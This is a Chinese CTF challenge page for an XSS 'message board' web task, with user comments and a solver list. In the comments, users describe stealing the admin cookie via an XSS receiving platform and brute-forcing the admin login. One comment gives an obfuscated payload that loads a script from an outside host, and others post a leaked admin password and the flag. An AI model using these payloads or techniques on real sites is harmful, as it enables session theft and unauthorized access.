留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一血奖励: 5金币
解  决: 2299
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
评论
1hon 1月前

找个xss平台,注入xss获取cookie

回复 0

Goodboy 2月前

按作者的思路不会做,搜了一下有教的也不具体。用老方法好了

回复 0

18956160518 2月前

难,参考https://blog.csdn.net/m0_57954651/article/details/127621060,不知道怎么得到密码的,就复制了,结果也出来了

回复 0

dzss 2月前

db.sql怎么链接不上

回复 0

dzss 2月前

这个密码怎么得出来的 admin 011be4d65feac1a8

回复 0

lwq522725 3月前

sCRiPt/SrC=//i0.al/Logugk>

回复 0

qixi 3月前

直接放入xss平台地址留言就行了

回复 0
Jaylon 2月前

来个xss平台

回复 0

popoh 4月前

db.sql压根就没有

回复 4

songci 4月前

flag{750d33e925f6dbf1784a1a924c237534}

回复 0

19881191586 4月前

第一步:用御剑或dirsearch扫描后台,发现index.php和admin.php 第二步:用工具爆破admin的登录密码 第三步:进入admin页面,刷新页面,弹出提示,提示里面出现URL编码后的flag 第四步:URL解码

回复 2

WriteUp

image
丶我亚索贼六

5 金币

评分(15)

解题动态

MC何失眠 攻破了该题 14小时前
yangcan666 攻破了该题 20小时前
Asamllcoder 攻破了该题 21小时前
huanying1247 攻破了该题 1天前
2200130448 攻破了该题 2天前
18993762527 攻破了该题 4天前
X9527C 攻破了该题 4天前
lszwmm 攻破了该题 4天前
xiao37 攻破了该题 5天前
JinYeTU 攻破了该题 6天前
guqiyuan 攻破了该题 7天前
yqwapc001 攻破了该题 7天前
Spirita 攻破了该题 7天前
junkbird 攻破了该题 7天前
Vinsonx 攻破了该题 8天前
srsr233 攻破了该题 8天前
ZhouShaoyang 攻破了该题 8天前
Graito 攻破了该题 9天前
18225355670 攻破了该题 9天前
18042157087 攻破了该题 9天前